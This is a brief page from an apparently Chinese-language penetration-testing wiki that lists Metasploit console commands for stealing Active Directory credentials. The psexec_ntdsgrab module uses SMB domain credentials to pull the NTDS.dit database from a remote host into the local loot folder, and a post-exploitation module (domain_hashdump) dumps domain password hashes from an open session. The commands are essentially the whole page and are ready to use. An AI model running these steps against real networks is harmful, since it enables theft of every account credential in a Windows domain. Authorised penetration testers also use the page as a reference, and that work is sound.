> For the complete documentation index, see [llms.txt](https://www.heresecurity.wiki/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.heresecurity.wiki/hash-cao-zuo/yu-hash-ti-qu/msf.md).

# MSF

```
>use auxiliary/admin/smb/psexec_ntdsgrab
>set rhost smbdomain smbuser smbpass
>exploit
Ntds.dit文件存在/root/.msf4/loot
后渗透模块
>use windows/gather/credentials/domain_hashdump
>set session 1
```
